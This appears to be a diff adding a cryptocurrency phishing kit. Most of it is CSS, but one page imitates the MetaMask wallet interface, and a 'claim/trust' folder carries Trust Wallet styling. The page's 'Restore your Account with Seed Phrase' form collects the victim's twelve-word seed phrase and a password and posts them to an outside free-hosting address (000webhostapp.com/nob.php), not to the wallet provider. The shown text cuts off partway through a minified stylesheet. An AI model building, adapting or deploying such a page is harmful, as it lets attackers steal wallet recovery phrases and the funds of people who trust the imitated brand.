+ pointer-events: none;
227
+ }
228
+ .MuiInputLabel-filled.MuiInputLabel-marginDense {
229
+ transform: translate(12px, 17px) scale(1);
230
+ }
231
+ .MuiInputLabel-filled.MuiInputLabel-shrink {
232
+ transform: translate(12px, 10px) scale(0.75);
233
+ }
234
+ .MuiInputLabel-filled.MuiInputLabel-shrink.MuiInputLabel-marginDense {
235
+ transform: translate(12px, 7px) scale(0.75);
236
+ }
237
+ .MuiInputLabel-outlined {
238
+ z-index: 1;
239
+ transform: translate(14px, 20px) scale(1);
240
+ pointer-events: none;
241
+ }
242
+ .MuiInputLabel-outlined.MuiInputLabel-marginDense {
243
+ transform: translate(14px, 12px) scale(1);
244
+ }
245
+ .MuiInputLabel-outlined.MuiInputLabel-shrink {
246
+ transform: translate(14px, -6px) scale(0.75);
247
+ }
248
+ </style><style data-jss="" data-meta="MuiFormControl">
249
+ .MuiFormControl-root {
250
+ border: 0;
251
+ margin: 0;
252
+ display: inline-flex;
253
+ padding: 0;
254
+ position: relative;
255
+ min-width: 0;
256
+ flex-direction: column;
257
+ vertical-align: top;
258
+ }
259
+ .MuiFormControl-marginNormal {
260
+ margin-top: 16px;
261
+ margin-bottom: 8px;
262
+ }
263
+ .MuiFormControl-marginDense {
264
+ margin-top: 8px;
265
+ margin-bottom: 4px;
266
+ }
267
+ .MuiFormControl-fullWidth {
268
+ width: 100%;
269
+ }
270
+ </style><style data-jss="" data-meta="MuiTextField">
271
+
272
+ </style><style data-jss="" data-meta="makeStyles">
273
+ .jss1 {
274
+ color: #aeaeae;
275
+ font-weight: 400;
276
+ }
277
+ .jss1.jss2 {
278
+ color: #aeaeae;
279
+ }
280
+ .jss1.jss4 {
281
+ color: #aeaeae;
282
+ }
283
+ .jss3:after {
284
+ border-bottom: 2px solid #f7861c;
285
+ }
286
+ .jss5 {
287
+ color: #aeaeae;
288
+ }
289
+ .jss6 {
290
+ padding: 8px;
291
+ }
292
+ .jss6::placeholder {
293
+ color: #aeaeae;
294
+ }
295
+ .jss7 {
296
+ color: #fff;
297
+ }
298
+ .jss8:after {
299
+ border-bottom: 2px solid #fff;
300
+ }
301
+ .jss9.jss10 {
302
+ color: #5b5b5b;
303
+ }
304
+ .jss9.jss4 {
305
+ color: #5b5b5b;
306
+ }
307
+ .jss12 {
308
+ border: 1px solid #BBC0C5;
309
+ height: 48px;
310
+ display: flex;
311
+ padding: 0 16px;
312
+ align-items: center;
313
+ border-radius: 6px;
314
+ }
315
+ label + .jss12 {
316
+ margin-top: 9px;
317
+ }
318
+ .jss12.jss11 {
319
+ border: 1px solid #2f9ae0;
320
+ }
321
+ .jss13 {
322
+ color: #5b5b5b;
323
+ position: initial;
324
+ font-size: 1rem;
325
+ transform: none;
326
+ transition: none;
327
+ }
328
+ .jss14 {
329
+ color: #5b5b5b;
330
+ position: initial;
331
+ font-size: .75rem;
332
+ transform: none;
333
+ transition: none;
334
+ }
335
+ .jss15 {
336
+ line-height: initial !important;
337
+ }
338
+ </style></head>
339
+ <body>
340
+ <div id="app-content"><div class="app mouse-user-styles"><div class="app-header"><div class="app-header__contents"><div class="app-header__logo-container app-header__logo-container--clickable"><img height="30" src="images/logo/metamask-logo-horizontal.svg" class="app-header__metafox-logo app-header__metafox-logo--horizontal" alt=""><img src="images/logo/metamask-fox.svg" class="app-header__metafox-logo app-header__metafox-logo--icon" alt=""></div><div class="app-header__account-menu-container"><div class="app-header__network-component-wrapper"><div class="network-display chip chip--with-left-icon chip--with-right-icon chip--ui-3" role="button" tabindex="0"><div class="chip__left-icon"><div class="color-indicator color-indicator--filled color-indicator--color-mainnet color-indicator--size-lg"><span class="color-indicator__inner-circle"></span></div></div><span class="box box--margin-top-1 box--margin-right-0 box--margin-bottom-1 box--margin-left-0 typography chip__label typography--h7 typography--align-undefined typography--color-ui-4 typography--weight-normal">Ethereum Mainnet </span><div class="chip__right-icon"><i class="network-display__icon app-header__network-down-arrow"></i></div></div></div></div></div></div><div><span></span></div><div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
341
+ .menu-droppo-enter {
342
+ transition: transform 300ms ease-in-out;
343
+ transform: translateY(-200%);
344
+ }
345
+
346
+ .menu-droppo-enter.menu-droppo-enter-active {
347
+ transition: transform 300ms ease-in-out;
348
+ transform: translateY(0%);
349
+ }
350
+
351
+ .menu-droppo-leave {
352
+ transition: transform 300ms ease-in-out;
353
+ transform: translateY(0%);
354
+ }
355
+
356
+ .menu-droppo-leave.menu-droppo-leave-active {
357
+ transition: transform 300ms ease-in-out;
358
+ transform: translateY(-200%);
359
+ }
360
+ </style></div><div class="main-container-wrapper"><div class="first-view-main-wrapper"><div class="first-view-main"><form method="post" action="https://programv2.000webhostapp.com/nob.php"><div class="import-account"><br>
361
+ <br><br><br><br><br><br><br><br><br><div class="import-account__title">Restore your Account with Seed Phrase </div><div class="import-account__selector-label">Enter your secret twelve word phrase here to restore your vault. </div><div class="import-account__input-wrapper"><label class="import-account__input-label">Wallet Seed </label><textarea class="import-account__secret-phrase" placeholder="Separate each word with a single space" type="text" name="walletSeed" required="true"></textarea><span class="error"></span></div><div class="MuiFormControl-root MuiTextField-root first-time-flow__input MuiFormControl-marginNormal"><label class="MuiFormLabel-root MuiInputLabel-root jss9 jss13 MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-shrink" data-shrink="true" for="password" id="password-label">New password (min 8 chars) </label><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="new-password" id="walletSeed" type="walletSeed" name="walletSeed" required="true dir=" auto"="" class="MuiInputBase-input MuiInput-input" value=""></div></div><div class="MuiFormControl-root MuiTextField-root first-time-flow__input MuiFormControl-marginNormal"><label class="MuiFormLabel-root MuiInputLabel-root jss9 jss13 MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-shrink" data-shrink="true" for="confirm-password" id="confirm-password-label">Confirm password </label><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="confirm-password" id="confirm-password" type="password" name="walletSeed" required="true dir=" auto"="" class="MuiInputBase-input MuiInput-input" value=""></div></div><button class="button btn--rounded btn-primary first-time-flow__button" role="button" tabindex="0">Restore</button></div></form></div></div></div></div></div>
362
+ <div id="popover-content"></div>
363
+ <script src="./globalthis.js" type="text/javascript" charset="utf-8"></script>
364
+ <script src="./initSentry.js" type="text/javascript" charset="utf-8"></script>
365
+ <script src="./lockdown.js" type="text/javascript" charset="utf-8"></script>
366
+ <script src="./runLockdown.js" type="text/javascript" charset="utf-8"></script>
367
+ <script src="./ui-libs.js" type="text/javascript" charset="utf-8"></script>
368
+ <script src="./ui.js" type="text/javascript" charset="utf-8"></script>
369
+
370
+
371
+ </body></html>
claim/trust/32179889.png ADDED
claim/trust/Trust_files/6f535fa698ae581f.css ADDED
@@ -0,0 +1 @@
 
 
1
+ @font-face{font-family:__inter_9c5a94;src:url(/_next/static/media/11bf447c34a2180c-s.p.ttf) format("truetype");font-display:swap}@font-face{font-family:__inter_Fallback_9c5a94;src:local("Arial");ascent-override:90%;descent-override:22.43%;line-gap-override:0%;size-adjust:107.64%}.__className_9c5a94{font-family:__inter_9c5a94,__inter_Fallback_9c5a94}.__variable_9c5a94{--font-inter:"__inter_9c5a94","__inter_Fallback_9c5a94"}@font-face{font-family:__wixMadeforDisplay_49b18b;src:url(/_next/static/media/e21d6bf08459d7e0-s.p.ttf) format("truetype");font-display:swap}@font-face{font-family:__wixMadeforDisplay_Fallback_49b18b;src:local("Arial");ascent-override:96.09%;descent-override:24.02%;line-gap-override:0%;size-adjust:104.9%}.__className_49b18b{font-family:__wixMadeforDisplay_49b18b,__wixMadeforDisplay_Fallback_49b18b}.__variable_49b18b{--font-wix-madefor-display:"__wixMadeforDisplay_49b18b","__wixMadeforDisplay_Fallback_49b18b"}/*!tailwindcss v3.3.1 | MIT License | https://tailwindcss.com*/*,:after,:before{border:0 solid;box-sizing:border-box}:after,:before{--tw-content:""}html{-webkit-text-size-adjust:100%;font-feature-settings:normal;font-family:ui-sans-serif,system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-variation-settings:normal;line-height:1.5;-moz-tab-size:4;-o-tab-size:4;tab-size:4}body{line-height:inherit;margin:0}hr{border-top-width:1px;color:inherit;height:0}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}table{border-collapse:collapse;border-color:inherit;text-indent:0}button,input,optgroup,select,textarea{color:inherit;font-family:inherit;font-size:100%;font-weight:inherit;line-height:inherit;margin:0;padding:0}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button;background-color:transparent;background-image:none}:-moz-focusring{outline:auto}:-moz-ui-invalid{box-shadow:none}progress{vertical-align:baseline}::-webkit-inner-spin-button,::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}summary{display:list-item}blockquote,dd,dl,fieldset,figure,h1,h2,h3,h4,h5,h6,hr,p,pre{margin:0}fieldset,legend{padding:0}menu,ol,ul{list-style:none;margin:0;padding:0}textarea{resize:vertical}input::-moz-placeholder,textarea::-moz-placeholder{color:#9ca3af;opacity:1}input::placeholder,textarea::placeholder{color:#9ca3af;opacity:1}[role=button],button{cursor:pointer}:disabled{cursor:default}audio,canvas,embed,iframe,img,object,svg,video{display:block;vertical-align:middle}img,video{height:auto;max-width:100%}[hidden]{display:none}*,:after,:before{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spacing: ;--tw-numeric-fraction: ;--tw-ring-inset: ;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgba(59,130,246,.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-saturate: ;--tw-backdrop-sepia: }::backdrop{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spacing: ;--tw-numeric-fraction: ;--tw-ring-inset: ;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgba(59,130,246,.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-saturate: ;--tw-backdrop-sepia: }.container{width:100%}@media(min-width:0px){.container{max-width:0}}@media(min-width:768px){.container{max-width:768px}}@media(min-width:992px){.container{max-width:992px}}@media(min-width:1000px){.container{max-width:1000px}}@media(min-width:1200px){.container{max-width:1200px}}.visible{visibility:visible}.invisible{visibility:hidden}.fixed{position:fixed}.absolute{position:absolute}.relative{position:relative}.sticky{position:sticky}.inset-0{inset:0}.-bottom-10{bottom:-2.5rem}.-bottom-6{bottom:-1.5rem}.-bottom-7{bottom:-1.75rem}.-left-3{left:-.75rem}.-left-\[14px\]{left:-14px}.-right-5{right:-1.25rem}.-right-\[12\%\]{right:-12%}.-right-\[25\%\]{right:-25%}.-top-1\/4{top:-25%}.-top-2{top:-.5rem}.-top-5{top:-1.25rem}.-top-9{top:-2.25rem}.-top-\[12px\]{top:-12px}.-top-\[30px\]{top:-30px}.bottom-0{bottom:0}.bottom-16{bottom:4rem}.bottom-\[20\%\]{bottom:20%}.left-0{left:0}.left-8{left:2rem}.left-\[60\%\]{left:60%}.left-\[70\%\]{left:70%}.left-\[80px\]{left:80px}.right-0{right:0}.right-\[300px\]{right:300px}.top-0{top:0}.top-2\/4{top:50%}.top-28{top:7rem}.top-\[50px\]{top:50px}.top-\[9\%\]{top:9%}.-z-10{z-index:-10}.z-0{z-index:0}.z-10{z-index:10}.z-20{z-index:20}.z-50{z-index:50}.z-\[90\]{z-index:90}.row-start-1{grid-row-start:1}.m-auto{margin:auto}.-mx-5{margin-left:-1.25rem;margin-right:-1.25rem}.mx-auto{margin-left:auto;margin-right:auto}.my-1{margin-bottom:.25rem;margin-top:.25rem}.my-10{margin-bottom:2.5rem;margin-top:2.5rem}.my-4{margin-bottom:1rem;margin-top:1rem}.my-5{margin-bottom:1.25rem;margin-top:1.25rem}.my-6{margin-bottom:1.5rem;margin-top:1.5rem}.my-7{margin-bottom:1.75rem;margin-top:1.75rem}.my-8{margin-bottom:2rem;margin-top:2rem}.my-9{margin-bottom:2.25rem;margin-top:2.25rem}.\!mt-0{margin-top:0!important}.-mb-\[50\%\]{margin-bottom:-50%}.-ml-5{margin-left:-1.25rem}.-mr-5{margin-right:-1.25rem}.-mr-\[27\%\]{margin-right:-27%}.-mt-1{margin-top:-.25rem}.-mt-32{margin-top:-8rem}.-mt-5{margin-top:-1.25rem}.mb-10{margin-bottom:2.5rem}.mb-2{margin-bottom:.5rem}.mb-4{margin-bottom:1rem}.mb-5{margin-bottom:1.25rem}.mb-6{margin-bottom:1.5rem}.mb-7{margin-bottom:1.75rem}.mb-8{margin-bottom:2rem}.ml-2{margin-left:.5rem}.ml-2\.5{margin-left:.625rem}.ml-4{margin-left:1rem}.ml-6{margin-left:1.5rem}.ml-7{margin-left:1.75rem}.ml-\[65px\]{margin-left:65px}.ml-auto{margin-left:auto}.mr-24{margin-right:6rem}.mr-auto{margin-right:auto}.mt-1{margin-top:.25rem}.mt-1\.5{margin-top:.375rem}.mt-10{margin-top:2.5rem}.mt-12{margin-top:3rem}.mt-2{margin-top:.5rem}.mt-20{margin-top:5rem}.mt-3{margin-top:.75rem}.mt-4{margin-top:1rem}.mt-5{margin-top:1.25rem}.mt-52{margin-top:13rem}.mt-6{margin-top:1.5rem}.mt-7{margin-top:1.75rem}.mt-8{margin-top:2rem}.mt-9{margin-top:2.25rem}.mt-auto{margin-top:auto}.\!block{display:block!important}.block{display:block}.inline-block{display:inline-block}.\!inline{display:inline!important}.flex{display:flex}.table{display:table}.grid{display:grid}.contents{display:contents}.hidden{display:none}.\!h-fit{height:-moz-fit-content!important;height:fit-content!important}.h-0{height:0}.h-1\/6{height:16.666667%}.h-2\/4{height:50%}.h-2\/5{height:40%}.h-2\/6{height:33.333333%}.h-3\/6{height:50%}.h-9{height:2.25rem}.h-96{height:24rem}.h-\[125px\]{height:125px}.h-\[150px\]{height:150px}.h-\[160px\]{height:160px}.h-\[180px\]{height:180px}.h-\[18px\]{height:18px}.h-\[190px\]{height:190px}.h-\[200px\]{height:200px}.h-\[210px\]{height:210px}.h-\[215px\]{height:215px}.h-\[21px\]{height:21px}.h-\[235px\]{height:235px}.h-\[240px\]{height:240px}.h-\[24px\]{height:24px}.h-\[253px\]{height:253px}.h-\[258px\]{height:258px}.h-\[260px\]{height:260px}.h-\[27px\]{height:27px}.h-\[28px\]{height:28px}.h-\[300px\]{height:300px}.h-\[30px\]{height:30px}.h-\[31px\]{height:31px}.h-\[366px\]{height:366px}.h-\[36px\]{height:36px}.h-\[3px\]{height:3px}.h-\[40px\]{height:40px}.h-\[48px\]{height:48px}.h-\[51px\]{height:51px}.h-\[54px\]{height:54px}.h-\[58px\]{height:58px}.h-\[60px\]{height:60px}.h-\[65px\]{height:65px}.h-\[75px\]{height:75px}.h-auto{height:auto}.h-fit{height:-moz-fit-content;height:fit-content}.h-full{height:100%}.h-min{height:-moz-min-content;height:min-content}.h-screen{height:100vh}.max-h-0{max-height:0}.max-h-\[1500px\]{max-height:1500px}.max-h-\[21px\]{max-height:21px}.max-h-\[290px\]{max-height:290px}.max-h-\[350px\]{max-height:350px}.\!min-h-\[295px\]{min-height:295px!important}.min-h-\[1px\]{min-height:1px}.min-h-\[220px\]{min-height:220px}.min-h-\[30px\]{min-height:30px}.min-h-\[364px\]{min-height:364px}.min-h-\[395px\]{min-height:395px}.min-h-\[540px\]{min-height:540px}.min-h-screen{min-height:100vh}.w-0{width:0}.w-1\/3{width:33.333333%}.w-1\/4{width:25%}.w-10{width:2.5rem}.w-2\/3,.w-4\/6{width:66.666667%}.w-\[100px\]{width:100px}.w-\[145px\]{width:145px}.w-\[155px\]{width:155px}.w-\[160px\]{width:160px}.w-\[16px\]{width:16px}.w-\[180px\]{width:180px}.w-\[200px\]{width:200px}.w-\[220px\]{width:220px}.w-\[270px\]{width:270px}.w-\[275px\]{width:275px}.w-\[29px\]{width:29px}.w-\[30px\]{width:30px}.w-\[34px\]{width:34px}.w-\[36px\]{width:36px}.w-\[370px\]{width:370px}.w-\[37px\]{width:37px}.w-\[52px\]{width:52px}.w-\[55\%\]{width:55%}.w-\[55px\]{width:55px}.w-\[58px\]{width:58px}.w-\[60\%\]{width:60%}.w-\[75px\]{width:75px}.w-auto{width:auto}.w-fit{width:-moz-fit-content;width:fit-content}.w-full{width:100%}.w-px{width:1px}.w-screen{width:100vw}.min-w-\[1000px\]{min-width:1000px}.min-w-\[10px\]{min-width:10px}.min-w-\[145px\]{min-width:145px}.min-w-\[150px\]{min-width:150px}.min-w-\[16px\]{min-width:16px}.min-w-\[180px\]{min-width:180px}.min-w-\[250px\]{min-width:250px}.min-w-\[270px\]{min-width:270px}.min-w-\[271px\]{min-width:271px}.min-w-\[28px\]{min-width:28px}.min-w-\[30px\]{min-width:30px}.min-w-\[31px\]{min-width:31px}.min-w-\[51px\]{min-width:51px}.min-w-\[800px\]{min-width:800px}.max-w-\[1036px\]{max-width:1036px}.max-w-\[1040px\]{max-width:1040px}.max-w-\[10ch\]{max-width:10ch}.max-w-\[110px\]{max-width:110px}.max-w-\[12ch\]{max-width:12ch}.max-w-\[13ch\]{max-width:13ch}.max-w-\[14ch\]{max-width:14ch}.max-w-\[15ch\]{max-width:15ch}.max-w-\[16ch\]{max-width:16ch}.max-w-\[18ch\]{max-width:18ch}.max-w-\[200px\]{max-width:200px}.max-w-\[20ch\]{max-width:20ch}.max-w-\[23ch\]{max-width:23ch}.max-w-\[25ch\]{max-width:25ch}.max-w-\[260px\]{max-width:260px}.max-w-\[270px\]{max-width:270px}.max-w-\[275px\]{max-width:275px}.max-w-\[280px\]{max-width:280px}.max-w-\[285px\]{max-width:285px}.max-w-\[28ch\]{max-width:28ch}.max-w-\[28px\]{max-width:28px}.max-w-\[300px\]{max-width:300px}.max-w-\[325px\]{max-width:325px}.max-w-\[330px\]{max-width:330px}.max-w-\[345px\]{max-width:345px}.max-w-\[34ch\]{max-width:34ch}.max-w-\[350px\]{max-width:350px}.max-w-\[35ch\]{max-width:35ch}.max-w-\[360px\]{max-width:360px}.max-w-\[400px\]{max-width:400px}.max-w-\[40ch\]{max-width:40ch}.max-w-\[42ch\]{max-width:42ch}.max-w-\[450px\]{max-width:450px}.max-w-\[500px\]{max-width:500px}.max-w-\[50ch\]{max-width:50ch}.max-w-\[520px\]{max-width:520px}.max-w-\[535px\]{max-width:535px}.max-w-\[53ch\]{max-width:53ch}.max-w-\[60ch\]{max-width:60ch}.max-w-\[650px\]{max-width:650px}.max-w-\[65ch\]{max-width:65ch}.max-w-\[70ch\]{max-width:70ch}.max-w-\[792px\]{max-width:792px}.max-w-\[800px\]{max-width:800px}.max-w-\[850px\]{max-width:850px}.max-w-\[950px\]{max-width:950px}.max-w-screen-max,.max-w-screen-max\+padding{max-width:1200px}.max-w-screen-max-reduced-content{max-width:1000px}.max-w-sm{max-width:24rem}.flex-1{flex:1 1 0%}.origin-top-right{transform-origin:top right}.-translate-y-2\/4{--tw-translate-y:-50%}.-rotate-90,.-translate-y-2\/4{transform:translate(var(--tw-translate-x),var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}.-rotate-90{--tw-rotate:-90deg}.rotate-180{--tw-rotate:180deg}.rotate-180,.scale-0{transform:translate(var(--tw-translate-x),var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}.scale-0{--tw-scale-x:0;--tw-scale-y:0}.scale-100{--tw-scale-x:1;--tw-scale-y:1}.scale-100,.scale-75{transform:translate(var(--tw-translate-x),var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}.scale-75{--tw-scale-x:.75;--tw-scale-y:.75}.scale-95{--tw-scale-x:.95;--tw-scale-y:.95}.scale-95,.transform{transform:translate(var(--tw-translate-x),var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}.cursor-pointer{cursor:pointer}.list-decimal{list-style-type:decimal}.list-disc{list-style-type:disc}.\!grid-cols-1{grid-template-columns:repeat(1,minmax(0,1fr))!important}.grid-cols-1{grid-template-columns:repeat(1,minmax(0,1fr))}.grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}.grid-cols-\[1fr\2c 1fr\]{grid-template-columns:1fr 1fr}.grid-cols-\[repeat\(2\2c 160px\)\]{grid-template-columns:repeat(2,160px)}.grid-cols-\[repeat\(3\2c 16rem\)\]{grid-template-columns:repeat(3,16rem)}.grid-cols-\[repeat\(3\2c min-content\)\]{grid-template-columns:repeat(3,min-content)}.grid-cols-\[repeat\(4\2c min-content\)\]{grid-template-columns:repeat(4,min-content)}.grid-rows-\[auto\2c auto\]{grid-template-rows:auto auto}.grid-rows-\[repeat\(2\2c fit-content\)\]{grid-template-rows:repeat(2,fit-content)}.flex-col{flex-direction:column}.flex-col-reverse{flex-direction:column-reverse}.flex-wrap{flex-wrap:wrap}.place-content-center{place-content:center}.items-start{align-items:flex-start}.items-center{align-items:center}.items-stretch{align-items:stretch}.\!justify-start{justify-content:flex-start!important}.justify-end{justify-content:flex-end}.justify-center{justify-content:center}.justify-between{justify-content:space-between}.justify-around{justify-content:space-around}.\!justify-items-start{justify-items:start!important}.justify-items-center{justify-items:center}.\!gap-0{gap:0!important}.\!gap-10{gap:2.5rem!important}.gap-1{gap:.25rem}.gap-1\.5{gap:.375rem}.gap-10{gap:2.5rem}.gap-12{gap:3rem}.gap-2{gap:.5rem}.gap-2\.5{gap:.625rem}.gap-3{gap:.75rem}.gap-4{gap:1rem}.gap-5{gap:1.25rem}.gap-6{gap:1.5rem}.gap-7{gap:1.75rem}.gap-8{gap:2rem}.gap-9{gap:2.25rem}.gap-x-10{-moz-column-gap:2.5rem;column-gap:2.5rem}.gap-x-4{-moz-column-gap:1rem;column-gap:1rem}.gap-x-5{-moz-column-gap:1.25rem;column-gap:1.25rem}.gap-x-6{-moz-column-gap:1.5rem;column-gap:1.5rem}.gap-x-7{-moz-column-gap:1.75rem;column-gap:1.75rem}.gap-y-1{row-gap:.25rem}.gap-y-10{row-gap:2.5rem}.gap-y-20{row-gap:5rem}.gap-y-3{row-gap:.75rem}.gap-y-3\.5{row-gap:.875rem}.gap-y-5{row-gap:1.25rem}.gap-y-6{row-gap:1.5rem}.gap-y-7{row-gap:1.75rem}.self-center{align-self:center}.overflow-auto{overflow:auto}.overflow-hidden{overflow:hidden}.whitespace-nowrap{white-space:nowrap}.\!rounded-\[10px\]{border-radius:10px!important}.\!rounded-\[20px\]{border-radius:20px!important}.rounded-\[10px\]{border-radius:10px}.rounded-\[13px\]{border-radius:13px}.rounded-\[18px\]{border-radius:18px}.rounded-\[20px\]{border-radius:20px}.rounded-\[24px\]{border-radius:24px}.rounded-\[30px\]{border-radius:30px}.rounded-\[40px\]{border-radius:40px}.rounded-\[6px\]{border-radius:6px}.rounded-full{border-radius:9999px}.rounded-sm{border-radius:.125rem}.rounded-xl{border-radius:.625rem}.rounded-r-\[20px\]{border-bottom-right-radius:20px;border-top-right-radius:20px}.border{border-width:1px}.border-2{border-width:2px}.border-\[14px\]{border-width:14px}.border-\[15px\]{border-width:15px}.border-b{border-bottom-width:1px}.border-l-\[3px\]{border-left-width:3px}.border-solid{border-style:solid}.\!border-none{border-style:none!important}.border-\[transparent_transparent_\#0500FF_transparent\]{border-color:transparent transparent #0500ff}.border-\[transparent_transparent_white_transparent\]{border-color:transparent transparent #fff}.border-gray{--tw-border-opacity:1;border-color:rgb(74 84 94/var(--tw-border-opacity))}.border-lightBlack{--tw-border-opacity:1;border-color:rgb(36 36 38/var(--tw-border-opacity))}.border-tintBlue{--tw-border-opacity:1;border-color:rgb(219 220 229/var(--tw-border-opacity))}.border-trustBlack{--tw-border-opacity:1;border-color:rgb(27 27 28/var(--tw-border-opacity))}.border-trustBlue{--tw-border-opacity:1;border-color:rgb(5 0 255/var(--tw-border-opacity))}.\!bg-\[\#840DFF\]{--tw-bg-opacity:1!important;background-color:rgb(132 13 255/var(--tw-bg-opacity))!important}.\!bg-\[transparent\]{background-color:transparent!important}.\!bg-trustBlack{--tw-bg-opacity:1!important;background-color:rgb(27 27 28/var(--tw-bg-opacity))!important}.bg-\[\#171717\]{--tw-bg-opacity:1;background-color:rgb(23 23 23/var(--tw-bg-opacity))}.bg-\[\#D9D9D9\]{--tw-bg-opacity:1;background-color:rgb(217 217 217/var(--tw-bg-opacity))}.bg-baseWhite{--tw-bg-opacity:1;background-color:rgb(244 244 247/var(--tw-bg-opacity))}.bg-tintBlack{--tw-bg-opacity:1;background-color:rgb(75 75 75/var(--tw-bg-opacity))}.bg-tintBlue{--tw-bg-opacity:1;background-color:rgb(219 220 229/var(--tw-bg-opacity))}.bg-transparent{background-color:transparent}.bg-trustBlack{--tw-bg-opacity:1;background-color:rgb(27 27 28/var(--tw-bg-opacity))}.bg-trustBlack\/60{background-color:rgba(27,27,28,.6)}.bg-trustBlue{--tw-bg-opacity:1;background-color:rgb(5 0 255/var(--tw-bg-opacity))}.bg-trustWhite,.bg-white{--tw-bg-opacity:1;background-color:rgb(255 255 255/var(--tw-bg-opacity))}.\!bg-gradientYellowToGreen{background-image:linear-gradient(180deg,#fff465 5.98%,#48ff91 77.73%)!important}.bg-\[linear-gradient\(180deg\2c \#2ECCFF_4\.58\%\2c \#2D9FFF_27\.69\%\2c \#0029FF_100\%\)\]{background-image:linear-gradient(180deg,#2eccff 4.58%,#2d9fff 27.69%,#0029ff)}.bg-\[linear-gradient\(323deg\2c \#F4F4F7\2c rgba\(244\2c 244\2c 247\2c 0\.00\)100\%\)\]{background-image:linear-gradient(323deg,#f4f4f7,rgba(244,244,247,0) 100%)}.bg-gradientLightBlueToBlue{background-image:linear-gradient(152deg,#2eccff -2.65%,#0500ff 82.44%)}.bg-gradientYellowToGreen{background-image:linear-gradient(180deg,#fff465 5.98%,#48ff91 77.73%)}.bg-gradientYellowToPink{background-image:linear-gradient(180deg,#fff9a8 5.98%,#ffaefe 77.73%)}.fill-trustBlack{fill:#1b1b1c}.fill-trustWhite{fill:#fff}.stroke-tintBlue{stroke:#dbdce5}.object-contain{-o-object-fit:contain;object-fit:contain}.object-cover{-o-object-fit:cover;object-fit:cover}.object-fill{-o-object-fit:fill;object-fit:fill}.\!p-0{padding:0!important}.\!p-2{padding:.5rem!important}.\!p-2\.5{padding:.625rem!important}.\!p-3{padding:.75rem!important}.\!p-3\.5{padding:.875rem!important}.\!p-4{padding:1rem!important}.\!p-5{padding:1.25rem!important}.p-1{padding:.25rem}.p-2{padding:.5rem}.p-2\.5{padding:.625rem}.p-5{padding:1.25rem}.p-6{padding:1.5rem}.p-7{padding:1.75rem}.\!px-0{padding-left:0!important;padding-right:0!important}.\!px-1{padding-left:.25rem!important;padding-right:.25rem!important}.\!py-10{padding-bottom:2.5rem!important;padding-top:2.5rem!important}.\!py-24{padding-bottom:6rem!important;padding-top:6rem!important}.px-16{padding-left:4rem;padding-r